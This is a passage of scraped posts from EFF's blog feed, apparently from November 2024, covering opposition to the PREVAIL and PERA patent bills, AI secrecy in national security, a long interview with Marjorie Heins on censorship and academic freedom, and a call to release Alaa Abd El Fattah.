investigative journalism, and, most of all, critical thinking. I\u2019m not saying there shouldn't be restrictions on speech in certain contexts, but do it because the speech is illegal or actively inciteful. Don\u2019t do it because you think it will achieve so-called information integrity. And especially, don\u2019t do it in ways that undermine the right to freedom of expression.<\/p><\/div><\/li>
<\/span><\/a><\/div>Oppose The Patent-Troll-Friendly PREVAIL Act<\/a><\/span>
by Joe Mullin<\/a> on November 20, 2024 at 6:38 pm <\/small>
Update 11\/21\/2024:\u00a0The Senate Judiciary Committee voted 11-10 in favor of\u00a0PREVAIL,\u00a0and several senators expressed concerns about the bill.\u00a0Thanks to\u00a0EFF supporters\u00a0who spoke out! We will continue to oppose this\u00a0misguided\u00a0bill.\u00a0\nGood news: the Senate Judiciary Committee has dropped one of the two terrible patent bills it was considering, the patent-troll-enabling Patent Eligibility Restoration Act (PERA).\nBad news: the committee is still pushing the PREVAIL Act, a bill that would hamstring the U.S.\u2019s most effective system for invalidating bad patents. PREVAIL is a windfall for patent trolls, and Congress should reject\u00a0 it.\nTake Action\nTell Congress: No New Bills For Patent Trolls\nOne of the most effective tools to fight bad patents in the U.S. is a little-known but important system called inter partes review, or IPR. Created by Congress in 2011, the IPR process addresses a major problem: too many invalid patents slip through the cracks at the U.S. Patent and Trademark Office. While not an easy or simple process, IPR is far less expensive and time-consuming than the alternative\u2014fighting invalid patents in federal district court.\nThat\u2019s why small businesses and individuals rely on IPR for protection. More than 85% of tech-related patent lawsuits are filed by non-practicing entities, also known as \u201cpatent trolls\u201d\u2014companies that don\u2019t have products or services of their own, but instead make dozens, or even hundreds, of patent claims against others, seeking settlement payouts.\nSo it\u2019s no surprise that patent trolls are frequent targets of IPR challenges, often brought by tech companies. Eliminating these worst-of-the-worst patents is a huge benefit to small companies and individuals that might otherwise be unable to afford an IPR challenge themselves.\u00a0\nFor instance, Apple used an IPR-like process to invalidate a patent owned by the troll Ameranth, which claimed rights over using mobile devices to order food. Ameranth had sued over 100 restaurants, hotels, and fast-food chains. Once the patent was invalidated, after an appeal to the Federal Circuit, Ameranth\u2019s barrage of baseless lawsuits came to an end.\u00a0\nPREVAIL Would Ban EFF and Others From Filing Patent Challenges\nThe IPR system isn\u2019t just for big tech\u2014it has also empowered nonprofits like EFF to fight patents that threaten the public interest.\u00a0\nIn 2013, a patent troll called Personal Audio LLC claimed that it had patented podcasting. The patent titled \u201cSystem for disseminating media content representing episodes in a serialized sequence,\u201d became the basis for the company\u2019s demand for licensing fees from podcasters nationwide. Personal Audio filed lawsuits against three podcasters and threatened countless others.\u00a0\u00a0\nEFF took on the challenge, raising over $80,000 through crowd-funding to file an IPR petition. The Patent Trial and Appeals Board agreed: the so-called \u201cpodcasting patent,\u201d should never have been granted. EFF proved that Personal Audio\u2019s claims were invalid, and our victory was upheld all the way to the Supreme Court.\u00a0\nThe PREVAIL Act would block such efforts. It limits IPR petitions to parties directly targeted by a patent owner, shutting out groups like EFF that protect the broader public. If PREVAIL becomes law, millions of people indirectly harmed by bad patents\u2014like podcasters threatened by Personal Audio\u2014will lose the ability to fight back.\nPREVAIL Tilts the\u00a0Field in Favor of Patent Trolls\nThe PREVAIL Act will make life easier for patent trolls at every step of the process. It is shocking that the Senate Judiciary Committee is using the few remaining hours it will be in session this year to advance a bill that undermines the rights of innovators and the public.\u00a0\u00a0\nPatent troll lawsuits target individuals and small businesses for simply using everyday technology. Everyone who can meet the legal requirements of an IPR filing should have the right to challenge invalid patents. Use our action center today and tell Congress: that\u2019s not a right we want to give up today.\u00a0\nTake Action\nTell Congress: reject the prevail act\n\nMore on the PREVAIL Act:\u00a0\n\n\nEFF\u2019s blog on how the PREVAIL Act takes rights away from the public\nOur coalition opposition letter to the Senate Judiciary Committee opposing PREVAIL\nRead why patients rights and consumer groups also oppose PREVAIL<\/p><\/div><\/li>
<\/span><\/a><\/div>The U.S. National Security State is Here to Make AI Even Less Transparent and Accountable<\/a><\/span>
by Matthew Guariglia<\/a> on November 19, 2024 at 7:37 pm <\/small>
The Biden White House has released a memorandum on \u201cAdvancing United States\u2019 Leadership in Artificial Intelligence\u201d which includes, among other things, a directive for the National Security apparatus to become a world leader in the use of AI. Under direction from the White House, the national security state is expected to take up this leadership position by poaching great minds from academia and the private sector and, most disturbingly, leveraging already functioning private AI models for national security objectives. \nPrivate AI systems like those operated by tech companies are incredibly opaque. People are uncomfortable\u2014and rightly so\u2014with companies that use AI to decide all sorts of things about their lives\u2013from how likely they are to commit a crime, to their eligibility for a job, to issues involving immigration, insurance, and housing. Right now, as you read this, for-profit companies are leasing their automated decision-making services to all manner of companies and employers and most of those affected will never know that a computer made a choice about them and will never be able to appeal that decision or understand how it was made. \nBut it can get worse; combining both private AI with national security secrecy threatens to make an already secretive system even more unaccountable and untransparent. The constellation of organizations and agencies that make up the national security apparatus are notoriously secretive. EFF has had to fight in court a number of times in an attempt to make public even the most basic frameworks of global dragnet surveillance and the rules that govern it. Combining these two will create a Frankenstein\u2019s Monster of secrecy, unaccountability, and decision-making power. \nWhile the Executive Branch pushes agencies to leverage private AI expertise, our concern is that more and more information on how those AI models work will be cloaked in the nigh-impenetrable veil of government secrecy. Because AI operates by collecting and processing a tremendous amount of data, understanding what information it retains and how it arrives at conclusions will all become incredibly central to how the national security state thinks about issues. This means not only will the state likely make the argument that the AI\u2019s training data may need to be classified, but they may also argue that companies need to, under penalty of law, keep the governing algorithms secret as well. \nAs the memo says, \u201cAI has emerged as an era-defining technology and has demonstrated significant and growing relevance to national security.\u00a0 The United States must lead the world in the responsible application of AI to appropriate national security functions.\u201d As the US national security state attempts to leverage powerful commercial AI to give it an edge, there are a number of questions that remain unanswered about how much that ever-tightening relationship will impact much needed transparency and accountability for private AI and for-profit automated decision making systems.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Now's The Time to Start (or Renew) a Pledge for EFF Through the CFC<\/a><\/span>
by Christian Romero<\/a> on November 19, 2024 at 7:18 pm <\/small>
The Combined Federal Campaign (CFC) pledge period is underway and runs through January 15, 2024! If you're a U.S. federal employee or retiree, be sure to show your support for EFF by using our CFC ID\u00a010437.\nNot sure how to make a pledge? No problem--it\u2019s easy! First, head over to GiveCFC.org and click \u201cDONATE.\u201d Then you can search for EFF using our CFC ID 10437 and make a pledge via payroll deduction, credit\/debit, or an e-check. If you have a renewing pledge, you can also increase your support there as well!\nThe CFC is the world\u2019s largest and most successful annual charity campaign for U.S. federal employees and retirees.\u00a0Last year, members of the CFC community raised nearly $34,000 to support EFF\u2019s work advocating for privacy and free expression online. That support has helped us:\n\nPush the Fifth Circuit Court of Appeals to\u00a0find that geofence warrants are \u201ccategorically\u201d unconstitutional.\nLaunch Digital Rights Bytes, a resource dedicated to teaching people how to take control of the technology they use every day.\nCall out unconstitutional age-verification and censorship laws across the U.S.\nContinue to develop and maintain our privacy-enhancing tools, like Certbot and Privacy Badger.\n\nFederal employees and retirees greatly impact our democracy and the future of civil liberties and human rights online. Support EFF\u2019s work by using our CFC ID 10437 when you make a pledge today!<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Marjorie Heins<\/a><\/span>
by David Greene<\/a> on November 19, 2024 at 7:15 pm <\/small>
This interview has been edited for length and clarity.\nMarjorie Heins is a writer, former civil rights\/civil liberties attorney, and past director of the Free Expression Policy Project (FEPP) and the American Civil Liberties Union's Arts Censorship Project. She is the author of \"Priests of Our Democracy: The Supreme Court, Academic Freedom, and the Anti-Communist Purge,\" which won the Hugh M. Hefner First Amendment Award in Book Publishing in 2013, and \"Not in Front of the Children: Indecency, Censorship, and the Innocence of Youth,\" which won the American Library Association's Eli Oboler Award for Best Published Work in the Field of Intellectual Freedom in 2002.\u00a0\nHer most recent book is \"Ironies and Complications of Free Speech: News and Commentary From the Free Expression Policy Project.\" She has written three other books and scores of popular and scholarly articles on free speech, censorship, constitutional law, copyright, and the arts. She has taught at New York University, the University of California - San Diego, Boston College Law School, and the American University of Paris. Since 2015, she has been a volunteer tour guide at the Metropolitan Museum of Art in New York City. \nGreene: Can you introduce yourself and the work you\u2019ve done on free speech and how you got there? \nHeins: I\u2019m Marjorie Heins, I\u2019m a retired lawyer. I spent most of my career at the ACLU. I started in Boston, where we had a very small office, and we sort of did everything\u2014some sex discrimination cases, a lot of police misconduct cases, occasionally First Amendment. Then, after doing some teaching and a stint at the Massachusetts Attorney General\u2019s office, I found myself in the national office of the ACLU in New York, starting a project on art censorship. This was in response to the political brouhaha over the National Endowment for the Arts starting around 1989\/ 1990. \nCulture wars, attacks on some of the grants made by the NEA, became a big hot button issue. The ACLU was able to raise a little foundation money to hire a lawyer to work on some of these cases. And one case that was already filed when I got there was National Endowment for the Arts vs Finley. It was basically a challenge by four theater performance artists whose grants had been recommended by the peer panel but then ultimately vetoed by the director after a lot of political pressure because their work was very much \u201con the edge.\u201d So I joined the legal team in that case, the Finley case, and it had a long and complicated history. Then, by the mid-1990s we were faced with the internet. And there were all these scares over pornography on the internet poisoning the minds of our children. So the ACLU got very involved in challenging censorship legislation that had been passed by Congress, and I worked on those cases. \nI left the ACLU in 1998 to write a book about what I had learned about censorship. I was curious to find out more about the history primarily of obscenity legislation\u2014the censorship of sexual communications. So it\u2019s a scholarly book called \u201cNot in front of the Children.\u201d Among the things I discovered is that the origins of censorship of sexual content, sexual communications, come out of this notion that we need to protect children and other \u201cvulnerable beings.\u201d And initially that included women and uneducated people, but eventually it really boiled down to children\u2014we need censorship basically of everybody in order to protect children. So that\u2019s what Not in front of the Children was all about.\u00a0\nAnd then I took my foundation contacts\u2014because at the ACLU if you have a project you have to raise money\u2014and started a little project, a little think tank which became affiliated with the National Coalition Against Censorship called the Free Expression Policy Project. And at that point we weren\u2019t really doing litigation anymore, we were doing a lot of friend of the court briefs, a lot of policy reports and advocacy articles about some of the values and competing interests in the whole area of free expression. And one premise of this project, from the start, was that we are not absolutists. So we didn\u2019t accept the notion that because the First Amendment says \u201cCongress shall make no law abridging the freedom of speech,\u201d then there\u2019s some kind of absolute protection for something called free speech and there can\u2019t be any exceptions. And, of course, there are many exceptions.\u00a0\nSo the basic premise of the Free Expression Policy Project was that some exceptions to the First Amendment, like obscenity laws, are not really justified because they are driven by different ideas about morality and a notion of moral or emotional harm rather than some tangible harm that you can identify like, for example, in the area of libel and slander or invasion of privacy or harassment. Yes, there are exceptions. The default, the presumption, is free speech, but there could be many reasons why free speech is curtailed in certain circumstances.\u00a0\nThe Free Expression Policy Project continued for about seven years. It moved to the Brennan Center for Justice at NYU Law School for a while, and, finally, I ran out of ideas and funding. I kept up the website for a little while longer, then ultimately ended the website. Then I thought, \u201cokay, there\u2019s a lot of good information on this website and it\u2019s all going to disappear, so I\u2019m going to put it into a book.\u201d Oh, I left out the other book I worked on in the early 2000s \u2013 about academic freedom, the history of academic freedom, called \u201cPriests of Our Democracy: The Supreme Court, Academic Freedom, and the Anti-Communist Purge.\u201d This book goes back in history even before the 1940s and 1950s Red Scare and the effect that it had on teachers and universities. And then this last book is called \u201cIronies and Complications of Free Speech: News and Commentary From the Free Expression Policy Project,\u201d which is basically an anthology of the best writings from the Free Expression Policy Project.\u00a0\nAnd that\u2019s me. That\u2019s what I did.\nGreene: So we have a ton to talk about because a lot of the things you\u2019ve written about are either back in the news and regulatory cycle or never left it. So I want to start with your book \u201cNot in Front of the Children\u201d first. I have at least one copy and I\u2019ve been referring to it a lot and suggesting it because we\u2019ve just seen a ton of efforts to try and pass new child protection laws to protect kids from online harms. And so I\u2019m curious, first there was a raft of efforts around Tik Tok being bad for kids, now we\u2019re seeing a lot of efforts aimed at shielding kids from harmful material online. Do you think this a throughline from concerns back from mid-19th Century England. Is it still the same debate or is there something different about these online harms?\u00a0\nBoth are true I think. It\u2019s the same and it\u2019s different. What\u2019s the same is that using the children as an argument for basically trying to suppress information, ideas, or expression that somebody disapproves of goes back to the beginning of censorship laws around sexuality. And the subject matters have changed, the targets have changed. I\u2019m not too aware of new proposals for internet censorship of kids, but I\u2019m certainly aware of what states\u2014of course, Florida being the most prominent example\u2014have done in terms of school books, school library books, public library books, and education from not only k-12 but also higher education in terms of limiting the subject matters that can be discussed. And the primary target seems to be anything to do with gay or lesbian sexuality and anything having to do with a frank acknowledgement of American slavery or Jim Crow racism. Because the argument in Florida, and this is explicit in the law, is because it would make white kids feel bad, so let\u2019s not talk about it. So in that sense the two targets that I see now\u2014we\u2019ve got to protect the kids against information about gay and lesbian people and information about the true racial history of this country\u2014are a little different from the 19th century and even much of the 20th century.\u00a0\nGreene: One of the things I see is that the harms motivating the book bans and school restrictions are the same harms that are motivating at least some of the legislators who are trying to pass these laws. And notably a lot of the laws only address online harmful material without being specific about subject matter. We\u2019re still seeing some that are specifically about sexual material, but a lot of them, including the Kids Online Safety Act really just focus on online harms more broadly.\u00a0\nI haven\u2019t followed that one, but it sounds like it might have a vagueness problem!\nGreene: One of the things I get concerned about with the focus on design is that, like, a state Attorney General is not going to be upset if the design has kids reading a lot of bible verses or tomes about being respectful to your parents. But they will get upset and prosecute people if the design feature is recommending to kids gender-affirming care or whatever. I just don\u2019t know if there\u2019s a way of protecting against that in a law.\u00a0\nWell, as we all know, when we\u2019re dealing with commercial speech there\u2019s a lot more leeway in terms of regulation, and especially if ads are directed at kids. So I don\u2019t have a problem with government legislation in the area of restricting the kinds of advertising that can be directed at kids. But if you get out of the area of commercial speech and to something that\u2019s kind of medical, could you have constitutional legislation that prohibited websites from directing kids to medically dangerous procedures? You\u2019re sort of getting close to the borderline. If it\u2019s just information then I think the legislation is probably going to be unconstitutional even if it\u2019s related to kids.\u00a0\nGreene: Let\u2019s shift to academic freedom. Which is another fraught issue. What do you think of the current debates now over both restrictions on faculty and universities restricting student speech?\u00a0\nAcademic freedom is under the gun from both sides of the political spectrum. For example, Diversity, Equity, and Inclusion (DEI) initiatives, although they seem well-intentioned, have led to some pretty troubling outcomes. So that when those college presidents were being interrogated by the members of Congress (in December 2023), they were in a difficult position, among other reasons, because at least at Harvard and Penn it was pretty clear there were instances of really appalling applications of this idea of Diversity, Equity, and Inclusion \u2013 both to require a certain kind of ideological approach and to censor or punish people who didn\u2019t go along with the party line, so to speak.\u00a0\nThe other example I\u2019m thinking of, and I don\u2019t know if Harvard and Penn do this \u2013 I know that the University of California system does it or at least it used to \u2013 everybody who applies for a faculty position has to sign a diversity statement, like a loyalty oath, saying that these are the principles they agree with and they will promise to promote.\u00a0\nAnd you know you have examples, I mean I may sound very retrograde on this one, but I will not use the pronoun \u201cthey\u201d for a singular person. And I know that would mean I couldn\u2019t get a faculty job! And I\u2019m not sure if my volunteer gig at the Met museum is going to be in trouble because they, very much like universities, have given us instructions, pages and pages of instructions, on proper terminology \u2013 what terminology is favored or disfavored or should never be used, and \u201cthey\u201d is in there. You can have circumlocutions so you can identify a single individual without using he or she if that individual \u2013 I mean you can\u2019t even know what the individual\u2019s preference is. So that\u2019s another example of academic freedom threats from I guess you could call the left or the DEI establishment.\u00a0\nThe right in American politics has a lot of material, a lot of ammunition to use when they criticize universities for being too politically correct and too \u201cwoke.\u201d On the other hand, you have the anti-woke law in Florida which is really, as I said before, directed against education about the horrible racial history of this country. And some of those laws are just \u2013 whatever you may think about the ability of state government and state education departments to dictate curriculum and to dictate what viewpoints are going to be promoted in the curriculum \u2013 the Florida anti-woke law and don\u2019t say gay law really go beyond I think any kind of discretion that the courts have said state and local governments have to determine curriculum.\u00a0\nGreene: Are you surprised at all that we\u2019re seeing that book bans are as big of a thing now as they were twenty years ago?\u00a0\nWell, nothing surprises me. But yes, I would not have predicted that there were going to be the current incarnations of what you can remember from the old days, groups like the American Family Association, the Christian Coalition, the Eagle Forum, the groups that were \u201cculture warriors\u201d who were making a lot of headlines with their arguments forty years ago against even just having art that was done by gay people. We\u2019ve come a long way from that, but now we have Moms for Liberty and present-day incarnations of the same groups. The homophobia agenda is a little more nuanced, it\u2019s a little different from what we were seeing in the days of Jesse Helms in Congress. But the attacks on drag performances, this whole argument that children are going to be groomed to become drag queens or become gay\u2014that\u2019s a little bit of a different twist, but it\u2019s basically the same kind of homophobia. So it\u2019s not surprising that it\u2019s being churned up again if this is something that politicians think they can get behind in order to get elected. Or, let me put it another way, if the Moms for Liberty type groups make enough noise and seem to have enough political potency, then politicians are going to cater to them.\u00a0\nAnd so the answer has to be groups on the other side that are making the free expression argument or the intellectual freedom argument or the argument that teachers and professors and librarians are the ones who should decide what books are appropriate. Those groups have to be as vocal and as powerful in order to persuade politicians that they don\u2019t have to start passing censorship legislation in order to get votes.\nGreene: Going back to the college presidents and being grilled on the hill, you wrote that maybe there was, in response to the genocide question, which I think they were most sharply criticized there, that there was a better answer that they could have given. Could you talk about that?\u00a0\nI think in that context, both for political reasons and for reasons of policy and free speech doctrine, the answer had to be that if students on campus are calling for genocide of Jews or any other ethnic or religious group that should not be permitted on campus and that amounts to racial harassment. Of course, I suppose you could imagine scenarios where two antisemitic kids in the privacy of their dorm room said this and nobody else heard it\u2014okay, maybe it doesn\u2019t amount to racial harassment. But private colleges are not bound by the First Amendment. They all have codes of civility. Public colleges are bound by the First Amendment, but not the same standards as the public square. So I took the position that in that circumstance the presidents had to answer, \u201cYes, that would violate our policies and subject a student to discipline.\u201d But that\u2019s not the same as calling for the intifada or calling for even the elimination of the state of Israel as having been a mistake 75 years ago. So I got a little pushback on that little blog post that I wrote. And somebody said, \u201cI\u2019m surprised a former ACLU lawyer is saying that calling for genocide could be punished on a college campus.\u201d But you know, the ACLU has many different political opinions within both the staff and Board. There were often debates on different kinds of free speech issues and where certain lines are drawn. And certainly on issues of harassment and when hate speech becomes harassment\u2014under what circumstances it becomes harassment. So, yes, I think that\u2019s what they should have said. A lot of legal scholars, including David Cole of the ACLU, said they gave exactly the right answer, the legalistic answer, that it depends on the context. In that political situation that was not the right answer.\u00a0\nGreene: It was awkward. They did answer as if they were having an academic discussion and not as if they were talking to members of Congress.\u00a0\nWell they also answered as if they were programmed. I mean Claudine Gay repeated the exact same words that probably somebody had told her to say at least twice if not more. And that did not look very good. It didn\u2019t look like she was even thinking for herself.\u00a0\nGreene: I do think they were anticipating the followup question of, \u201cWell isn\u2019t saying \u2018From the River to the Sea\u2019 a call for genocide and how come you haven\u2019t punished students for that?\u201d But as you said, that would then lead into a discussion of how we determine what is or is not a call for genocide.\u00a0\nWell they didn\u2019t need a followup question because to Elise Stefanik, \u201cIntifada\u201d or \u201cfrom the river to the sea\u201d was equivalent to a call for genocide, period, end of discussion. Let me say one more thing about these college hearings. What these presidents needed to say is that it\u2019s very scary when politicians start interrogating college faculty or college presidents about curriculum, governance, and certainly faculty hires. One of the things that was going on there was they didn\u2019t think there were enough conservatives on college faculties, and that was their definition of diversity. You have to push back on that, and say it is a real threat to academic freedom and all of the values that we talk about that are important at a university education when politicians start getting their hands on this and using funding as a threat and so forth. They needed to say that.\u00a0\n\u00a0Greene: Let\u2019s pull back and talk about free speech principles more broadly. Why is, after many years of work in this area, why do you think free expression is important?\u00a0\nWhat is the value of free expression more globally? [laughs] A lot of people have opined on that.\u00a0\nGreene: Why is it important to you personally?\u00a0\nWell I define it pretty broadly. So it doesn\u2019t just include political debate and discussion and having all points of view represented in the public square, which used to be the narrower definition of what the First Amendment meant, certainly according to the Supreme Court. But the Court evolved. And so it\u2019s now recognized, as it should be, that free expression includes art. The movies\u2014it doesn\u2019t even have to be verbal\u2014it can be dance, it can be abstract painting. All of the arts, which feed the soul, are part of free expression. And that\u2019s very important to me because I think it enriches us. It enriches our intellects, it enriches our spiritual lives, our emotional lives. And I think it goes without saying that political expression is crucial to having a democracy, however flawed it may be.\u00a0\nGreene: You mentioned earlier that you don\u2019t consider yourself to be a free speech absolutist. Do you consider yourself to be a maximalist or an enthusiast? What do you see as being sort of legitimate restrictions on any individual\u2019s freedom of expression?\nWell, we mentioned this at the beginning. There are a lot of exceptions to the First Amendment that are legitimate and certainly, when I started at the ACLU I thought that defamation laws and libel and slander laws violate the first amendment. Well, I\u2019ve changed my opinion. Because there\u2019s real harm that gets caused by libel and slander. As we know, the Supreme Court has put some First Amendment restrictions around those torts, but they\u2019re important to have. Threats are a well-recognized exception to the freedom of speech, and the kind of harm caused by threats, even if they\u2019re not followed through on, is pretty obvious. Incitement becomes a little trickier because where do you draw the lines? But at some point an incitement to violent action I think can be restricted for obvious reasons of public safety. And then we have restrictions on false advertising but, of course, if we\u2019re not in the commercial context, the Supreme Court has told us that lies are protected by the First Amendment. That\u2019s probably wise just in terms of not trying to get the government and the judicial process involved in deciding what is a lie and what isn\u2019t. But of course that\u2019s done all the time in the context of defamation and commercial speech. Hate speech is something, as we know, that\u2019s prohibited in many parts of Europe but not here. At least not in the public square as opposed to employment contexts or educational contexts. Some people would say, \u201cWell, that\u2019s dictated by the First Amendment and they don\u2019t have the First Amendment over there in Europe, so we\u2019re better.\u201d But having worked in this area for a long time and having read many Supreme Court decisions, it seems to me the First Amendment has been subjected to the same kind of balancing test that they use in Europe when they interpret their European Convention on Human Rights or their individual constitutions. They just have different policy choices. And the policy choice to prohibit hate speech given the history of Europe is understandable. Whether it is effective in terms of reducing racism, Islamophobia, antisemitism\u2026 is there more of that in Europe than there is here? Hard to know. It\u2019s probably not that effective. You make martyrs out of people who are prosecuted for hate speech. But on the other hand, some of it is very troubling. In the United States Holocaust denial is protected.\u00a0\nGreene: Can you talk a little bit about your experience being a woman advocating for first amendment rights for sexual expression during a time when there was at least some form of feminist movement saying that some types of sexualization of women was harmful to women?\u00a0\nThat drove a wedge right through the feminist movement for quite a number of years. There\u2019s still some of that around, but I think less. The battle against pornography has been pretty much a losing battle.\u00a0\nGreene: Are there lessons from that time? You were clearly on one side of it, are there lessons to be learned from that when we talk about sort of speech harms?\u00a0\nOne of the policy reports we did at the Free Expression Policy Project was on media literacy as an alternative to censorship. Media literacy can be expanded to encompass a lot of different kinds of education. So if you had decent sex education in this country and kids were able to think about the kinds of messages that you see in commercial pornography and amateur pornography, in R-rated movies, in advertising\u2014I mean the kind of sexist messages and demeaning messages that you see throughout the culture\u2014education is the best way of trying to combat some of that stuff.\u00a0\nGreene: Okay, our final question that we ask everyone. Who is your free speech hero?\u00a0\nWhen I started working on \u201cPriests of our Democracy\u201d the most important case, sort of the culmination of the litigation that took place challenging loyalty programs and loyalty oaths, was a case called Keyishian v. Board of Regents. This is a case in which Justice Brennan, writing for a very slim majority of five Justices, said academic freedom is \u201ca special concern of the First Amendment, which does not tolerate laws that cast a pall of orthodoxy over the classroom.\u201d Harry Keyishian was one of the five plaintiffs in this case. He was one of five faculty members at the University of Buffalo who refused to sign what was called the Feinberg Certificate, which was essentially a loyalty oath. The certificate required all faculty to say \u201cI\u2019ve never been a member of the Communist Party and if I was, I told the President and the Dean all about it.\u201d He was not a member of the Communist Party, but as Harry said much later in an interview \u2013 because he had gone to college in the 1950s and he saw some of the best professors being summarily fired for refusing to cooperate with some of these Congressional investigating committees \u2013 fast forward to the Feinberg Certificate loyalty oath: he said his refusal to sign was his \u201crevenge on the 1950s.\u201d And so he becomes the plaintiff in this case that challenges the whole Feinberg Law, this whole elaborate New York State law that basically required loyalty investigations of every teacher in the public system. So Harry became my hero. I start my book with Harry. The first line in my book is, \u201cHarry Keyishian was a junior at Queen\u2019s College in the Fall of 1952 when the Senate Internal Security Subcommittee came to town.\u201d And he\u2019s still around. I think he just had his 90th birthday! \n\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>On Alaa Abd El Fattah\u2019s 43rd Birthday, the Fight For His Release Continues<\/a><\/span>
by Jillian C. York<\/a> on November 18, 2024 at 5:13 pm <\/small>
Today marks prominent British-Egyptian coder, blogger, activist, and political prisoner Alaa Abd El Fattah\u2019s 43rd birthday\u2014his eleventh behind bars. Alaa should have been released on September 29, but Egyptian authorities have continued his imprisonment in contravention of the country\u2019s own Criminal Procedure Code. Since September 29, Alaa\u2019s mother, mathematician Leila Soueif, has been on hunger strike, while she and the rest of his family have worked to engage the British government in securing Alaa\u2019s release.\nLast November, an international counsel team acting on behalf of Alaa\u2019s family filed an urgent appeal to the UN Working Group on Arbitrary Detention. EFF joined 33 other organizations in supporting the submission and urging the UNWGAD promptly to issue its opinion on the matter. Last week, we signed another letter urging the UNWGAD once again to issue an opinion. \nDespite his ongoing incarceration, Alaa\u2019s writing and his activism have continued to be honored worldwide. In October, he was announced as the joint winner of the PEN Pinter Prize alongside celebrated writer Arundhati Roy. His 2021 collection of essays, You Have Not Yet Been Defeated, has been re-released as part of Fitzcarraldo Editions\u2019 First Decade Collection. Alaa is also the 2023 winner of PEN Canada\u2019s One Humanity Award and the 2022 winner of EFF\u2019s own EFF Award for Democratic Reform Advocacy.\nEFF once again calls for Alaa Abd El Fattah\u2019s immediate and unconditional release and urges the UN Working Group on Arbitrary Detention to promptly issue its opinion on his incarceration. We further urge the British government to take action to secure his release.<\/p><\/div><\/li>
<\/span><\/a><\/div>\"Why Is It So Expensive To Repair My Devices?\"<\/a><\/span>
by Christian Romero<\/a> on November 14, 2024 at 6:30 pm <\/small>
Now, of course, we\u2019ve all dropped a cell phone, picked it up, and realized that we\u2019ve absolutely destroyed its screen. Right? Or is it just me...? Either way, you\u2019ve probably seen how expensive it can be to repair a device, whether it be a cell phone, laptop, or even a washing machine.\u00a0\u00a0\nDevice repair doesn\u2019t need to be expensive, but companies have made repair a way to siphon more money from your pocket to theirs. It doesn\u2019t need to be this way, and with our new site\u2014Digital Rights Bytes\u2014we lay out how we got here and what we can do to fix this issue.\u00a0\nCheck out our short one-minute video explaining why device repair has become so expensive and what you can do to defend your right to repair. If you\u2019re hungry to learn more, we\u2019ve broken up some key takeaways into small byte-sized pieces you can even share with your family and friends.\u00a0\u00a0\nDigital Rights Bytes also has answers to other common questions including if your phone is actually listening to you, ownership of your digital media, and more. Got any additional questions you\u2019d like us to answer in the future? Let us know on your favorite social platform using the hashtag #DigitalRightsBytes so we can find it!<\/p><\/div><\/li>
<\/span><\/a><\/div>EFF Is Ready for What's Next | EFFector 36.14<\/a><\/span>
by Christian Romero<\/a> on November 13, 2024 at 5:55 pm <\/small>
Don't be\u00a0scared of your backlog of digital rights news,\u00a0instead,\u00a0check out EFF's EFFector newsletter! It's\u00a0the one-stop-shop to keeping up with the latest in the fight for online freedoms. This time we cover\u00a0our expectations and preparations for the\u00a0next U.S. presidential administration,\u00a0surveillance towers\u00a0at the U.S.-Mexico border, and EFF's new report on the use of\u00a0AI in Latin America.\nIt can feel overwhelming to stay up to date, but we've got you covered with our EFFector newsletter! You can\u00a0read the full issue here, or\u00a0subscribe\u00a0to get the next one in your inbox automatically! You can also listen to the audio version of the newsletter on the\u00a0Internet Archive\u00a0or by clicking the button below:\nLISTEN ON YOUTUBE\nEFFECTOR 36.14 - EFF IS READY FOR WHAT'S NEXT\nSince 1990 EFF has published EFFector to help keep readers on the bleeding edge of their digital rights. We know that the intersection of technology, civil liberties, human rights, and the law can be complicated, so EFFector is a great way to stay on top of things. The newsletter is chock full of links to updates, announcements, blog posts, and other stories to help keep readers\u2014and listeners\u2014up to date on the movement to protect online privacy and free expression.\u00a0\nThank you to the supporters around the world who make our work possible! If you're not a member yet,\u00a0join EFF today\u00a0to help us fight for a brighter digital future.<\/p><\/div><\/li>
<\/span><\/a><\/div>Tell Congress To Stop These Last-Minute Bills That Help Patent Trolls<\/a><\/span>
by Joe Mullin<\/a> on November 13, 2024 at 5:25 pm <\/small>
Update 11\/21\/2024: The Senate Judiciary Committee voted 11-10 in favor of PREVAIL,\u00a0and several senators expressed concerns about the bill.\u00a0Thanks to\u00a0EFF supporters\u00a0who spoke out! We will continue to oppose this misguided bill.\u00a0\nUpdate 11\/14\/2024:\u00a0The PERA and PREVAIL patent bills were pulled at the last minute today, without getting a committee vote. Senators are right to have concerns with these deeply flawed bills.\u00a0We hope to engage with the next Congress on real patent fixes\u2014changes that will create a more fair system for small companies and everyday users of tech.\u00a0 Thanks to all those who spoke out! If you haven't told Congress your opinion on these terrible patent bills, you can still do so using our action center linked below. Help us move the next Congress in a different direction.\u00a0\nThis week, the Senate Judiciary Committee is set to use its limited time in the lame-duck session to vote on a bill that would make the patent system even worse.\u00a0\nThe Patent Eligibility Restoration Act (S. 2140), or PERA, would undo vital limits on computer technology patents that the Supreme Court established in the\u00a0 landmark 2014 Alice v. CLS Bank decision. Alice barred patent applicants from obtaining patents simply by adding generic computer language to abstract ideas.\u00a0\nTake Action\nTell Congress: No New Bills For Patent Trolls\nWhile Alice hasn\u2019t fully fixed the problems of the patent system, or patent trolling, it has led to the rejection of hundreds of terrible software patents, including patents on crowdfunding, tracking packages, photo contests, watching online ads, computer bingo, upselling, and many others.\u00a0\nPERA would not only revive these dangerous technology patents, but also expand patenting of human genes\u2014a type of patent the Supreme Court\u00a0essentially blocked in 2013.\u00a0\nThe Senate Judiciary is also scheduled to vote on the PREVAIL Act (S. 2220) that seeks to severely limit the public\u2019s ability to challenge bad patents at the patent office. These challenges are among the most effective tools for eliminating patents that never should have been granted in the first place.\u00a0\nPassing these bills would sell out the public interest to a narrow group of patent holders. EFF stands together with a broad coalition of patients rights groups, consumer rights organizations, think tanks, startups, and business organizations to oppose these harmful bills.\u00a0\nThis week, we need to show Congress that everyday users and creators won\u2019t support laws that foster more patent abuse. Help us send a clear message to your representatives in Congress today.\u00a0\nTake Action\nTell Congress to reject pera and prevail\nThe U.S. Senate must reject bills like these that would allow the worst patent scams to expand and thrive.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Tanka Aryal<\/a><\/span>
by David Greene<\/a> on November 12, 2024 at 8:13 pm <\/small>
